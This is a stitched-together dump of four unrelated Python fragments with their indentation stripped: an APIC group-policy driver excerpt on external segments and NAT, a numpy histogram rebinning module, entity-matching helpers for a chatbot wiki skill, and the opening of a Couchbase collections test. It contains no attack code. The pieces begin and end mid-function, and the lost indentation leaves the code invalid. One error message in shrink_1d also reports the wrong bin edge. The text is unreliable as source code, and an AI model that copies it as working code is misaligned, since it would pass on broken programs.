context, es['name']) if pre_existing else es_name),
transaction=trs)
elif not is_edge_nat:
# create tenant-specific NAT EPG if required
self._create_tenant_specific_nat_epg(context, es,
context.current, transaction=trs)
if not is_shadow:
if nat_enabled:
# create shadow external-networks
self._plug_l3p_to_es(context, es, True)
# create shadow external EPGs indirectly by re-plugging
# external policies to external segment
eps = context._plugin.get_external_policies(
context._plugin_context,
filters={'id': es['external_policies'],
'tenant_id': [context.current['tenant_id']]})
for ep in eps:
self._plug_external_policy_to_segment(context, ep,
[es['id']], ep['provided_policy_rule_sets'],
ep['consumed_policy_rule_sets'])
else:
# Associate BDs of the VRF to L3-out
l2ps = self._get_l2_policies(context._plugin_context,
{'id': context.current['l2_policies']})
for l2p in l2ps:
self.apic_manager.set_l3out_for_bd(
self._tenant_by_sharing_policy(l2p),
self.name_mapper.l2_policy(context, l2p),
es_name_pre if pre_existing else es_name)
def _unplug_l3p_from_es(self, context, es, is_shadow=False):
is_edge_nat = False
if is_shadow:
ext_info = self.apic_manager.ext_net_dict.get(es['name'])
is_edge_nat = self._is_edge_nat(ext_info)
es_name = self.name_mapper.external_segment(context, es,
prefix=self._get_shadow_prefix(context,
is_shadow, context.current, is_edge_nat))
es_name_pre = self.name_mapper.name_mapper.pre_existing(
context._plugin_context, es['name'])
es_tenant = self._get_tenant_for_shadow(is_shadow, context.current, es)
nat_enabled = self._is_nat_enabled_on_es(es)
pre_existing = False if is_shadow else self._is_pre_existing(es)
if not is_shadow:
if nat_enabled:
# remove shadow external-networks
self._unplug_l3p_from_es(context, es, True)
if not is_edge_nat:
# remove tenant-specific NAT EPG if required
self._remove_tenant_specific_nat_epg(context, es,
context.current)
else:
# Dissociate BDs of the VRF from L3-out
l2ps = self._get_l2_policies(context._plugin_context,
{'id': context.current['l2_policies']})
for l2p in l2ps:
self.apic_manager.unset_l3out_for_bd(
self._tenant_by_sharing_policy(l2p),
self.name_mapper.l2_policy(context, l2p),
es_name_pre if pre_existing else es_name)
set_ctx = self.apic_manager.set_context_for_external_routed_network
if (is_shadow or
not [x for x in es['l3_policies'] if x != context.current['id']]):
with self.apic_manager.apic.transaction() as trs:
if is_shadow or not pre_existing:
self.apic_manager.delete_external_routed_network(
es_name, owner=es_tenant, transaction=trs)
# Dissociate L3policy from pre-existing, no-NAT L3-out
if pre_existing and not nat_enabled:
l3out_info = self._query_l3out_info(es_name_pre,
self.name_mapper.tenant(es))
if l3out_info:
mapped_tenant = l3out_info['l3out_tenant']
set_ctx(mapped_tenant, es_name_pre, None,
transaction=trs)
if nat_enabled and not is_shadow:
self.apic_manager.unset_l3out_for_bd(es_tenant,
self._get_nat_bd_for_es(context, es),
(self.name_mapper.name_mapper.pre_existing(
context, es['name'])
if pre_existing else es_name),
transaction=trs)
# if its edge nat then we have to release
# the vlan associated with this shadow L3out
if is_shadow and self._is_edge_nat(ext_info):
self.l3out_vlan_alloc.release_vlan(
es['name'], context.current['id'])
l2ps = self._get_l2_policies(context._plugin_context,
{'id': context.current['l2_policies']})
for l2p in l2ps:
self.apic_manager.unset_l3out_for_bd(
self._tenant_by_sharing_policy(l2p),
self.name_mapper.l2_policy(context, l2p),
es_name)
def _build_routes_dict(self, routes):
result = {}
for route in routes:
if route['destination'] not in result:
result[route['destination']] = []
result[route['destination']].append(route['nexthop'])
return result
def _plug_external_policy_to_segment(self, context, ep, segments,
provided_prs, consumed_prs,
l3policy_obj=None):
is_shadow = bool(l3policy_obj)
if segments:
added_ess = context._plugin.get_external_segments(
context._plugin_context, filters={'id': segments})
for es in added_ess:
ext_info = self.apic_manager.ext_net_dict.get(es['name'])
if not ext_info:
LOG.warning(UNMANAGED_SEGMENT % es['id'])
continue
pfx = self._get_shadow_prefix(context, is_shadow, l3policy_obj,
self._is_edge_nat(ext_info))
ep_name = self.name_mapper.external_policy(context, ep,
prefix=pfx)
pre_existing = (False if is_shadow else
self._is_pre_existing(es))
pre_existing_epg = False
nat_enabled = self._is_nat_enabled_on_es(es)
if not pre_existing:
es_name = self.name_mapper.external_segment(context,
es, prefix=pfx)
es_tenant = self._get_tenant_for_shadow(is_shadow,
l3policy_obj, es)
if nat_enabled and not is_shadow:
ep_name = self.name_mapper.external_segment(context,
es, prefix="default-")
else:
es_name = self.name_mapper.name_mapper.pre_existing(
context, es['name'])
l3out_info = self._query_l3out_info(es_name,
self.name_mapper.tenant(es))
if not l3out_info:
LOG.warning(PRE_EXISTING_SEGMENT % es['name'])
continue
es_tenant = l3out_info['l3out_tenant']
pre_existing_epg = (
ext_info.get('external_epg') == ep['name'])
if pre_existing_epg:
ep_name = self.name_mapper.name_mapper.pre_existing(
context, ep['name'])
with self.apic_manager.apic.transaction() as trs:
# Create External EPG - with no route restrictions on the
# 'real' one and with proper destination routes
# in the shadow
if not pre_existing_epg:
subnets = set((x['destination'] for
x in es['external_routes'])
if (is_shadow or not nat_enabled)
else ['0.0.0.0/0'])
for s in subnets:
self.apic_manager.ensure_external_epg_created(
es_name, subnet=s, external_epg=ep_name,
owner=es_tenant, transaction=trs)
if is_shadow or not nat_enabled:
# User-specified contracts are associated with
# shadow external EPGs (if NAT is enabled) or
# real external EPGs (if NAT is disabled)
self._manage_ep_policy_rule_sets(
context._plugin_context, es, ep,
provided_prs, consumed_prs, [], [],
l3policy_obj, transaction=trs)
if is_shadow:
if not self._is_edge_nat(ext_info):
nat_epg_tenant, nat_epg_name = (
self._determine_nat_epg_for_es(
context, es, l3policy_obj))
# set up link to NAT EPG
(self.apic_manager.
associate_external_epg_to_nat_epg(
es_tenant, es_name, ep_name,
nat_epg_name, target_owner=nat_epg_tenant,
transaction=trs))
elif nat_enabled:
# 'real' external EPGs provide and consume
# allow-all contract when NAT is enabled
nat_contract = self._get_nat_contract_for_es(
context, es)
self.apic_manager.set_contract_for_external_epg(
es_name, nat_contract,
external_epg=ep_name, owner=es_tenant,
provided=True, transaction=trs)
self.apic_manager.set_contract_for_external_epg(
es_name, nat_contract,
external_epg=ep_name, owner=es_tenant,
provided=False, transaction=trs)
# create shadow external epgs in L3policies associated
# with the segment
if nat_enabled and not is_shadow:
l3ps = context._plugin.get_l3_policies(
context._plugin_context,
filters={'id': es['l3_policies'],
'tenant_id': [ep['tenant_id']]})
for l3p in l3ps:
self._plug_external_policy_to_segment(context, ep,
[es['id']], provided_prs, consumed_prs,
l3policy_obj=l3p)
def _unplug_external_policy_from_segment(self, context, ep, segments,
l3policy_obj=None):
is_shadow = bool(l3policy_obj)
if segments:
added_ess = context._plugin.get_external_segments(
context._plugin_context, filters={'id': segments})
for es in added_ess:
ext_info = self.apic_manager.ext_net_dict.get(es['name'])
if not ext_info:
LOG.warning(UNMANAGED_SEGMENT % es['id'])
continue
pfx = self._get_shadow_prefix(context, is_shadow, l3policy_obj,
self._is_edge_nat(ext_info))
ep_name = self.name_mapper.external_policy(context, ep,
prefix=pfx)
pre_existing = (False if is_shadow else
self._is_pre_existing(es))
pre_existing_epg = False
nat_enabled = self._is_nat_enabled_on_es(es)
if nat_enabled and not is_shadow:
# remove the shadow external EPGs from L3policies
# associated with the segment
l3ps = context._plugin.get_l3_policies(
context._plugin_context,
filters={'id': es['l3_policies'],
'tenant_id': [ep['tenant_id']]})
for l3p in l3ps:
self._unplug_external_policy_from_segment(context, ep,
[es['id']], l3policy_obj=l3p)
if not pre_existing:
es_name = self.name_mapper.external_segment(context, es,
prefix=pfx)
es_tenant = self._get_tenant_for_shadow(is_shadow,
l3policy_obj, es)
if nat_enabled and not is_shadow:
ep_name = self.name_mapper.external_segment(context,
| |
<gh_stars>0
"""Functions for rebinning histogram-like distributions."""
# TODO: DVP: implement propagation in result the indexes computed on shrink
# for reuse in FMesh.shrink for equivalent grids or alike
from typing import Tuple
import collections.abc
import gc
import itertools
import platform
import numpy as np
from numpy import ndarray
if platform.system() == "Linux":
from mckit_meshes.utils.no_daemon_process import Pool
else:
Pool = None
# TODO
__all__ = [
"interpolate",
"is_monotonically_increasing",
"rebin_1d",
"rebin_nd",
"rebin_spec_composer",
"shrink_1d",
"shrink_nd",
"trim_spec_composer",
]
__revision__ = "$Id$"
__ZERO = np.array([0.0], dtype=float)
__EXTERNAL_PROCESS_THRESHOLD = 1000000
# noinspection PyTypeChecker
def is_monotonically_increasing(a: ndarray):
if not a.size:
return False
iterator = iter(a)
prev = next(iterator)
for val in iterator:
if prev < val:
prev = val
else:
return False
return True
def set_axis(indices, axis, a_shape):
shape = [1] * len(a_shape)
shape[axis] = a_shape[axis]
return indices.reshape(tuple(shape))
def interpolate(x_new, x, y, axis=None):
if y.ndim == 1:
return np.interp(x_new, x, y)
if axis is None:
axis = 0
x_new_indices = np.digitize(x_new, x)
x_new_indices = x_new_indices.clip(1, len(x) - 1).astype(int)
lo = x_new_indices - 1
hi = x_new_indices
x_lo = x[lo]
deltas = x[hi] - x_lo
nd = y.ndim
slice1 = [slice(None)] * nd
slice2 = [slice(None)] * nd
slice1[axis] = lo
slice2[axis] = hi
slice1 = tuple(slice1)
slice2 = tuple(slice2)
y_lo = y[slice1]
y_deltas = y[slice2] - y_lo
deltas = set_axis(deltas, axis, y_deltas.shape)
slope = y_deltas / deltas
new_deltas = x_new - x_lo
new_deltas = set_axis(new_deltas, axis, slope.shape)
y_new = slope * new_deltas + y_lo
return y_new
def rebin_1d(a, bins, new_bins, axis=0, grouped=False, assume_sorted=False):
"""Transforms 1-D histogram defined as `data` on the limiting points
define like `bins` to equivalent (see the terms below) histogram defined
on other limiting points defined as `new_bins`.
Notes
-----
The algorithm maintains the equality of integral on intervals defined on
new_bins for the original and rebinned distributions.
Parameters
----------
a: ndarray
The array to rebin
bins: ndarray
Defines 1-D array representing `a` binning along the given `axis
new_bins: ndarray
The new binning required.
axis: int, optional
An axis along which to rebin array `a`
grouped: bool, optional
Defines the approach for rebinning.
- If `True`, then the values in `a` represent the data already
integrated over bins, like in energy group distributions.
On rebinning maintain equivalence of integral over same
energy range in old and new bins.
- If `False` (default), as for spatial binning - maintain the same
average value in the same volume in old and new bins.
assume_sorted: bool, optional
If True, then skip assertion of bins sorting order,
by default False - asserts the input_file data
Returns
-------
rebinned_data: ndarray
"""
assert (
bins[0] <= new_bins[0] and new_bins[-1] <= bins[-1]
), "Rebinning doesn't provide extrapolation out of the original bins"
assert (
bins.size == a.shape[axis] + 1
), "The `a` array shape doesn't match the given bins and axis"
assert assume_sorted or is_monotonically_increasing(bins)
assert assume_sorted or is_monotonically_increasing(new_bins)
ndim = a.ndim
if grouped:
t = a
else:
diff = np.diff(bins)
if ndim > 1:
diffs_shape = [1] * ndim
diffs_shape[axis] = a.shape[axis]
diffs_shape = tuple(diffs_shape)
diff = diff.reshape(diffs_shape)
t = a * diff
cum = np.cumsum(t, axis=axis)
cum = np.insert(cum, 0, __ZERO, axis=axis)
rebinned_data = interpolate(new_bins, bins, cum, axis=axis)
rebinned_data = np.diff(rebinned_data, axis=axis)
# del cum
if a.size > __EXTERNAL_PROCESS_THRESHOLD:
gc.collect()
del gc.garbage[:]
if not grouped:
new_diff = np.diff(new_bins)
if ndim > 1:
diffs_shape = [1] * ndim
diffs_shape[axis] = rebinned_data.shape[axis]
new_diff = new_diff.reshape(tuple(diffs_shape))
rebinned_data /= new_diff
return rebinned_data
def rebin_nd(
a,
rebin_spec,
assume_sorted=False,
external_process_threshold=__EXTERNAL_PROCESS_THRESHOLD,
):
"""
Rebin an array `a` over multidimensional grid.
Parameters
----------
a: ndarray
A data to rebin.
rebin_spec: Iterator
An iterator listing tuples specifying bins, new_bins, axis and
grouped parameters for rebinning.
See :py:func:`rebin_1d` for details on the parameters.
assume_sorted: bool, optional
If True skip assertion of bins sorting order,
by default False - asserts the input_file data
external_process_threshold: int
If size of `a` is greater than that, then the computation is executed in external process,
to achieve immediate memory cleanup.
Returns
--------
rebinned_data: ndarray
"""
if not isinstance(rebin_spec, collections.abc.Iterator):
rebin_spec = iter(rebin_spec)
try:
bins, new_bins, axis, grouped = next(rebin_spec)
except StopIteration:
return a
if Pool is not None and a.size > external_process_threshold:
recursion_res = Pool(processes=1).apply(
rebin_nd, args=(a, rebin_spec, assume_sorted)
)
else:
recursion_res = rebin_nd(a, rebin_spec, assume_sorted)
res = rebin_1d(recursion_res, bins, new_bins, axis, grouped, assume_sorted)
del recursion_res
if a.size > external_process_threshold:
n = gc.collect()
if n:
del gc.garbage[:]
return res
def rebin_spec_composer(bins_seq, new_bins_seq, axes=None, grouped_flags=None):
"""Compose rebin_spec parameter.
See also :py:func:`mckit_meshes.utils.rebin.rebin_nd` with reasonable defaults
for axes and grouped iterators.
Args:
bins_seq: sequence of ndarrays
Iterates over the list of original bins
new_bins_seq: sequence of ndarrays
Iterates over the list of new bins.
axes: sequence of ints, optional
Iterates over the list of corresponding axes.
If not provided (default), then iterates over sequence 0 ... len(bins).
grouped_flags: sequence of booleans, optional
Iterates over a sequence of grouped flags.
If not provided (default),
then all the axes considered as not grouped.
If constant boolean value is proved, then for
all the axes this value is applied.
Returns:
Iterator: ... over the sequence of tuples (bins, new_bins, axis, grouped)
"""
if not axes:
axes = itertools.count()
if isinstance(grouped_flags, bool):
grouped_flags = itertools.repeat(grouped_flags)
elif not grouped_flags:
grouped_flags = itertools.repeat(False)
return zip(bins_seq, new_bins_seq, axes, grouped_flags)
# @numba.jit
def shrink_1d(
a: np.ndarray, bins: np.ndarray, low=None, high=None, axis=None, assume_sorted=False
) -> Tuple[np.ndarray, np.ndarray]:
"""Select sub-arrays of a `a` and corresponding `bins` for minimal span
of bins, which completely covers the range [`low`..`high`]
both sides included.
Args:
a: ndarray
An array to shrink.
bins: ndarray
Bins corresponding to the grid `a` over the given `axis`.
low: float, optional
Left edge of the range to shrink to.
When omitted, the `bins` left edge is used.
high: float
Right edge of the range to shrink to.
When omitted, the `bins` right edge is used.
axis: int, optional
An axis of `a` over which to shrink. Default axis = 0.
assume_sorted: bool, optional
If True skip assertion of bins sorting order,
by default False - asserts the input_file data
Returns:
new_bins: ndarray
The shrank bins
new_data: ndarray
The shrank grid
"""
if low is None and high is None:
return bins, a
if axis is None:
axis = 0
assert a.shape[axis] == bins.size - 1
assert assume_sorted or is_monotonically_increasing(bins)
if low is None:
low = bins[0]
if high is None:
high = bins[-1]
if low == bins[0] and high == bins[-1]:
return bins, a
if low < bins[0] or bins[-1] < low:
raise ValueError(
"Low shrink edge is beyond the bins range: %g is not in [%g..%g]"
% (low, bins[0], bins[-1])
)
if high < bins[0] or bins[-1] < high:
raise ValueError(
"High shrink edge is beyond the bins range: %g is not in [%g..%g]"
% (high, bins[1], bins[-1])
)
left_idx, right_idx = np.digitize([low, high], bins) - 1
if left_idx > 0 and bins[left_idx] > low:
left_idx -= 1
if right_idx < bins.size - 1 and bins[right_idx] < high:
right_idx += 1
if right_idx - left_idx < 1:
raise ValueError("Shrink results to empty grid")
if left_idx == 0 and right_idx == bins.size:
return bins, a
indices = list(range(left_idx, right_idx + 1))
new_bins = np.take(bins, indices)
new_a = np.take(a, indices[:-1], axis=axis)
return new_bins, new_a
def shrink_nd(a, trim_spec, assume_sorted=False):
"""Perform multidimensional shrink.
Args:
a: ndarray
The grid to shrink.
trim_spec: sequence of tuples
Iterates over tuples (bins, low, high, axis)
assume_sorted: bool, optional
If True skip assertion of bins sorting order,
by default False - asserts the input_file data
Returns:
new_bins_seq: sequence of ndarrays
A sequence with new bins.
recursed_data: ndarray
The shrunk grid.
"""
if not isinstance(trim_spec, collections.abc.Iterator):
trim_spec = iter(trim_spec)
try:
bins, left, right, axis = next(trim_spec)
except StopIteration:
return None, a
new_bins_seq, recursed_data = shrink_nd(a, trim_spec, assume_sorted)
top_bins, top_data = shrink_1d(
recursed_data, bins, left, right, axis, assume_sorted
)
if new_bins_seq:
new_bins_seq = [top_bins] + new_bins_seq
else:
new_bins_seq = [top_bins]
return new_bins_seq, top_data
def trim_spec_composer(bins_seq, lefts=None, rights=None, axes=None):
"""
Helps to compose trim_spec parameter in
:py:func:`triniti_ne.rebin.trim_nd` with
reasonable defaults for lefts, rights and axes iterators.
Parameters
----------
| |
you want to learn about {} of {}?",
"Are you interested in {} of {}?",
"Do you want to hear about {} of {}?",
"Do you want to know about {} of {}?",
"Do you want me to tell you about {} of {}?",
"The next topic is {} of {}, continue?",
"Let me tell you about {} of {}, okey?",
]
QUESTION_TEMPLATES_SHORT = [
"Would you like to know about {}?",
"Do you want to learn about {}?",
"Are you interested in {}?",
"Do you want to hear about {}?",
"Do you want to know about {}?",
"Do you want me to tell you about {}?",
"The next topic is {}, continue?",
"Let me tell you about {}, okey?",
]
NEWS_MORE = [
"Do you want more details?",
"Should I continue?",
"What is your opinion?",
"Do you want to hear more?",
"I can tell you more, okay?",
"Would you like to learn more?",
]
dff_wiki_phrases = ["Are you listening to music or playing games"]
CONF_DICT = {
"UNDEFINED": 0.0,
"USER_QUESTION_IN_BEGIN": 0.8,
"ENTITY_IN_HISTORY": 0.9,
"WIKI_TYPE_DOUBT": 0.9,
"OTHER_DFF_SKILLS": 0.9,
"WIKI_TYPE": 0.94,
"IN_SCENARIO": 0.95,
"SURE_WIKI_TYPE": 0.98,
"WIKI_TOPIC": 0.99,
"HIGH_CONF": 1.0,
}
WIKI_BADLIST = re.compile(r"(margin|\bfont\b|wikimedia|wikitable| url )", re.IGNORECASE)
transfer_from_skills = {
"dff_animals_skill": {
"Q16521", # taxon
"Q55983715", # organisms known by a particular common name
"Q38547", # dog crossbreed
"Q39367", # dog breed
"Q43577", # cat breed
},
"dff_food_skill": {"Q28149961", "Q2095", "Q11004"},
"dff_sport_skill": {
"Q2066131", # athlete
"Q18536342", # competitive player
"Q20639856", # team
"Q847017", # sports club
},
"dff_music_skill": {
"Q488205", # singer-songwriter
"Q36834", # composer
"Q177220", # singer
"Q753110", # songwriter
"Q134556", # single
"Q7366", # song
"Q482994", # album
},
"dff_movie_skill": {"Q11424", "Q24856", "Q10800557", "Q10798782", "Q2405480", "Q5398426", "Q15416", "Q2526255"},
"dff_book_skill": {
"Q36180",
"Q49757",
"Q214917",
"Q6625963",
"Q28389",
"Q571",
"Q277759",
"Q8261",
"Q47461344",
"Q7725634",
"Q1667921",
},
}
def find_entity_wp(annotations, bot_uttr, specific_types=None):
conf_type = "UNDEFINED"
found_entity_substr = ""
found_entity_id = ""
found_entity_types = []
nounphr_label_dict = {}
nounphrases = annotations.get("cobot_entities", {}).get("labelled_entities", [])
for nounphr in nounphrases:
nounphr_text = nounphr.get("text", "")
nounphr_label = nounphr.get("label", "")
if nounphr_text and nounphr_label:
nounphr_label_dict[nounphr_text] = nounphr_label
bot_text = bot_uttr.get("text", "")
bot_question = "?" in bot_text
prev_active_skill = bot_uttr.get("active_skill", "")
current_types = set()
if bot_question and prev_active_skill and prev_active_skill in transfer_from_skills:
current_types = transfer_from_skills[prev_active_skill]
cobot_topics = annotations.get("cobot_topics", {}).get("text", [])
wp_output = annotations.get("wiki_parser", {})
if isinstance(wp_output, dict):
all_entities_info = wp_output.get("entities_info", {})
wiki_skill_entities_info = wp_output.get("wiki_skill_entities_info", {})
topic_skill_entities_info = wp_output.get("topic_skill_entities_info", {})
for entities_info in [all_entities_info, wiki_skill_entities_info, topic_skill_entities_info]:
for entity, triplets in entities_info.items():
entity_id = triplets.get("plain_entity", "")
types = (
triplets.get("types", [])
+ triplets.get("instance of", [])
+ triplets.get("subclass of", [])
+ triplets.get("occupation", [])
+ triplets.get("types_2hop", [])
)
type_ids = [elem for elem, label in types]
if specific_types:
inters = set(type_ids).intersection(specific_types)
else:
inters = set(type_ids).intersection(used_types)
coherent_with_prev = True
if current_types and not set(type_ids).intersection(current_types):
coherent_with_prev = False
in_not_used_types = set(type_ids).intersection(prohibited_types)
in_not_used_topics = entity.lower() in prohibited_topics or entity.lower() in badlist_words
token_conf = triplets["token_conf"]
conf = triplets["conf"]
found_animal = re.findall(ANIMALS_FIND_TEMPLATE, entity)
in_banned_topics = found_animal or "Food_Drink" in cobot_topics
if (
inters
and not in_not_used_topics
and not in_banned_topics
and nounphr_label_dict.get(entity, "") != "number"
and coherent_with_prev
and token_conf > 0.5
and conf > 0.2
):
pos = triplets.get("pos", 5)
found_entity_substr = entity
found_entity_id = entity_id
found_entity_types = inters
conf_type = "WIKI_TYPE"
if token_conf > 0.9 and conf > 0.8 and pos == 0:
conf_type = "SURE_WIKI_TYPE"
if pos > 0:
conf_type = "WIKI_TYPE_DOUBT"
if in_not_used_types:
conf_type = "OTHER_DFF_SKILLS"
break
if found_entity_substr:
break
return found_entity_substr, found_entity_id, found_entity_types, conf_type
def find_entity_types(query_entity, annotations):
type_ids = set()
wp_output = annotations.get("wiki_parser", {})
if isinstance(wp_output, dict):
all_entities_info = wp_output.get("entities_info", {})
wiki_skill_entities_info = wp_output.get("wiki_skill_entities_info", {})
topic_skill_entities_info = wp_output.get("topic_skill_entities_info", {})
for entities_info in [all_entities_info, wiki_skill_entities_info, topic_skill_entities_info]:
for entity, triplets in entities_info.items():
if entity == query_entity:
types = (
triplets.get("types", [])
+ triplets.get("instance of", [])
+ triplets.get("subclass of", [])
+ triplets.get("occupation", [])
+ triplets.get("types_2hop", [])
)
type_ids = set([elem for elem, label in types])
return type_ids
return type_ids
def find_entity_by_types(annotations, types_to_find, relations=None):
found_entity_wp = ""
found_types = []
found_entity_triplets = {}
wp_output = annotations.get("wiki_parser", {})
types_to_find = set(types_to_find)
if isinstance(wp_output, dict):
all_entities_info = wp_output.get("entities_info", {})
wiki_skill_entities_info = wp_output.get("wiki_skill_entities_info", {})
topic_skill_entities_info = wp_output.get("topic_skill_entities_info", {})
for entities_info in [all_entities_info, wiki_skill_entities_info, topic_skill_entities_info]:
for entity, triplets in entities_info.items():
types = (
triplets.get("types", [])
+ triplets.get("instance of", [])
+ triplets.get("subclass of", [])
+ triplets.get("types_2_hop", [])
+ triplets.get("occupation", [])
)
type_ids = [elem for elem, label in types]
logger.info(f"types_to_find {types_to_find} type_ids {type_ids}")
inters = set(type_ids).intersection(types_to_find)
conf = triplets["conf"]
pos = triplets.get("pos", 5)
if inters and conf > 0.6 and pos < 2:
found_entity_wp = entity
found_types = list(inters)
entity_triplets = {}
if relations:
for relation in relations:
objects_info = triplets.get(relation, [])
if objects_info:
objects = [obj[1] for obj in objects_info]
entity_triplets[relation] = objects
if entity_triplets:
found_entity_triplets[entity] = entity_triplets
break
return found_entity_wp, found_types, found_entity_triplets
def find_entity_nounphr(annotations):
found_entity_substr = ""
conf_type = "UNDEFINED"
nounphrases = annotations.get("cobot_entities", {}).get("labelled_entities", [])
found = False
for nounphr in nounphrases:
nounphr_text = nounphr.get("text", "")
nounphr_label = nounphr.get("label", "")
in_not_used_substr = nounphr_text.lower() in prohibited_topics or nounphr_text.lower() in badlist_words
if nounphr_text in used_substr and not in_not_used_substr and nounphr_label != "number":
found_entity_substr = nounphr_text
conf_type = "WIKI_TOPIC"
found_animal = re.findall(ANIMALS_FIND_TEMPLATE, found_entity_substr)
found = True
if found_animal:
conf_type = "OTHER_DFF_SKILLS"
break
if not found_entity_substr:
for used_entity_substr in used_substr:
if (
re.findall(rf"\b{nounphr_text}\b", used_entity_substr, re.IGNORECASE)
or re.findall(rf"\b{used_entity_substr}\b", nounphr_text, re.IGNORECASE)
and not in_not_used_substr
):
found_entity_substr = used_entity_substr
conf_type = "WIKI_TOPIC"
found = True
break
if found:
break
return found_entity_substr, conf_type
def check_nounphr(annotations, nounphr_to_find):
nounphrases = annotations.get("cobot_entities", {}).get("labelled_entities", [])
for nounphr in nounphrases:
nounphr_text = nounphr.get("text", "")
nounphr_label = nounphr.get("label", "")
if nounphr_text in nounphr_to_find and nounphr_label != "number":
return nounphr_text
return ""
def if_user_dont_know_topic(user_uttr, bot_uttr):
flag = False
what_to_talk_about = re.findall(COMPILE_WHAT_TO_TALK_ABOUT, bot_uttr.get("text", ""))
user_dont_know = re.findall("(do not|dont|don't) know", user_uttr["text"]) or re.findall(
"(anything|everything)", user_uttr["text"]
)
if what_to_talk_about and user_dont_know:
flag = True
return flag
def check_condition_element(elem, user_uttr, bot_uttr, shared_memory={}):
flag = False
annotations = user_uttr["annotations"]
isyes = is_yes(user_uttr)
isno = is_no(user_uttr)
user_info = shared_memory.get("user_info", {})
entity_triplets = shared_memory.get("entity_triplets", {})
if elem[0] == "is_yes" and isyes:
flag = True
elif elem[0] == "is_no" and isno:
flag = True
elif "pattern" in elem[0]:
pattern = elem[0]["pattern"]
if elem[1] == "user" and (
(isinstance(pattern, str) and re.findall(pattern, user_uttr["text"], re.IGNORECASE))
or (isinstance(pattern, re.Pattern) and re.findall(pattern, user_uttr["text"]))
):
flag = True
if elem[1] == "bot" and (
(isinstance(pattern, str) and re.findall(pattern, bot_uttr.get("text", ""), re.IGNORECASE))
or (isinstance(pattern, re.Pattern) and re.findall(pattern, bot_uttr.get("text", "")))
):
flag = True
elif "cobot_entities_type" in elem[0]:
cobot_entities_type = elem[0]["cobot_entities_type"]
nounphrases = annotations.get("cobot_entities", {}).get("labelled_entities", [])
for nounphr in nounphrases:
nounphr_label = nounphr.get("label", "")
if nounphr_label == cobot_entities_type:
flag = True
elif "wiki_parser_types" in elem[0]:
wp_types = elem[0]["wiki_parser_types"]
found_entity, *_ = find_entity_by_types(annotations, wp_types)
if found_entity:
flag = True
elif "user_info" in elem[0]:
info_to_check = elem[0]["user_info"]
for key, value in info_to_check.items():
if key in user_info and user_info[key] == value:
flag = True
break
elif "entity_triplets" in elem[0]:
checked_entity_triplets = elem[0]["entity_triplets"]
objects = set(checked_entity_triplets[-1])
mem_objects = entity_triplets
for key in checked_entity_triplets[:-1]:
if key in user_info:
key = user_info[key]
mem_objects = mem_objects.get(key, {})
if set(mem_objects).intersection(objects):
flag = True
elif elem[0] == "any":
flag = True
if len(elem) == 3 and not elem[2]:
flag = not flag
return flag
def check_condition(condition, user_uttr, bot_uttr, shared_memory):
flag = False
checked_elements = []
for elem in condition:
if isinstance(elem[0], str) or isinstance(elem[0], dict):
flag = check_condition_element(elem, user_uttr, bot_uttr, shared_memory)
elif isinstance(elem[0], list):
flag = all([check_condition_element(sub_elem, user_uttr, bot_uttr, shared_memory) for sub_elem in elem])
checked_elements.append(flag)
if any(checked_elements):
flag = True
return flag
def if_switch_test_skill(user_uttr, bot_uttr):
flag = False
if re.findall(r"(\bart\b|drawing|painting|photo)", user_uttr["text"], re.IGNORECASE):
flag = True
return flag
def if_switch_wiki_skill(user_uttr, bot_uttr):
flag = False
user_uttr_annotations = user_uttr["annotations"]
found_entity_substr, found_entity_id, found_entity_types, conf_type_wp = find_entity_wp(
user_uttr_annotations, bot_uttr
)
found_entity_substr, conf_type_nounphr = find_entity_nounphr(user_uttr_annotations)
user_dont_know = if_user_dont_know_topic(user_uttr, bot_uttr)
asked_name = "what is your name" in bot_uttr.get("text", "").lower()
asked_news = "news" in user_uttr["text"]
for topic, topic_info in topic_config.items():
pattern = topic_info.get("pattern", "")
if (
(isinstance(pattern, str) and re.findall(pattern, user_uttr["text"], re.IGNORECASE))
or (isinstance(pattern, re.Pattern) and re.findall(pattern, user_uttr["text"]))
or if_chat_about_particular_topic(user_uttr, bot_uttr, compiled_pattern=pattern)
):
flag = True
switch_on = topic_info.get("switch_on", [])
for switch_elem in switch_on:
condition = switch_elem["cond"]
checked_condition = check_condition(condition, user_uttr, bot_uttr, | |
from copy import deepcopy
from BucketLib.bucket import Bucket
from Cb_constants import DocLoading
from bucket_collections.collections_base import CollectionBase
from cb_tools.cbstats import Cbstats
from collections_helper.collections_spec_constants import MetaCrudParams
from couchbase_helper.documentgenerator import doc_generator
from couchbase_helper.durability_helper import DurabilityHelper
from error_simulation.cb_error import CouchbaseError
from error_simulation.disk_error import DiskError
from remote.remote_util import RemoteMachineShellConnection
class CollectionsSuccessTests(CollectionBase):
def setUp(self):
super(CollectionsSuccessTests, self).setUp()
self.bucket = self.cluster.buckets[0]
def tearDown(self):
super(CollectionsSuccessTests, self).tearDown()
def __perform_collection_crud(self, mutation_num=1,
verification_dict=None):
collection_crud_spec = dict()
collection_crud_spec["doc_crud"] = dict()
collection_crud_spec[
MetaCrudParams.SCOPES_TO_ADD_PER_BUCKET] = 2
collection_crud_spec[
MetaCrudParams.COLLECTIONS_TO_ADD_FOR_NEW_SCOPES] = 5
collection_crud_spec[
MetaCrudParams.COLLECTIONS_TO_ADD_PER_BUCKET] = 10
collection_crud_spec["doc_crud"][
MetaCrudParams.DocCrud.NUM_ITEMS_FOR_NEW_COLLECTIONS] = 100
collection_crud_spec["doc_crud"][
MetaCrudParams.DocCrud.COMMON_DOC_KEY] = "test_collections"
collection_crud_task = \
self.bucket_util.run_scenario_from_spec(
self.task,
self.cluster,
self.cluster.buckets,
collection_crud_spec,
mutation_num=mutation_num)
if collection_crud_task.result is False:
self.log_failure("Collection CRUD failed")
if verification_dict is not None:
self.update_verification_dict_from_collection_task(
verification_dict,
collection_crud_task)
def test_basic_ops(self):
"""
Basic tests for document CRUD operations using JSON docs
"""
load_spec = dict()
verification_dict = dict()
# Stat validation reference variables
verification_dict["ops_create"] = 0
verification_dict["ops_update"] = 0
verification_dict["ops_delete"] = 0
verification_dict["rollback_item_count"] = 0
verification_dict["sync_write_aborted_count"] = 0
verification_dict["sync_write_committed_count"] = 0
for _, scope in self.bucket.scopes.items():
for _, collection in scope.collections.items():
verification_dict["ops_create"] += collection.num_items
if self.durability_level in self.supported_d_levels:
verification_dict["sync_write_committed_count"] \
+= collection.num_items
failed = self.durability_helper.verify_vbucket_details_stats(
self.bucket, self.cluster_util.get_kv_nodes(self.cluster),
vbuckets=self.cluster.vbuckets,
expected_val=verification_dict)
if failed:
self.fail("Cbstat vbucket-details verification failed")
# load_spec["target_vbuckets"] = []
load_spec["doc_crud"] = dict()
load_spec["doc_crud"][
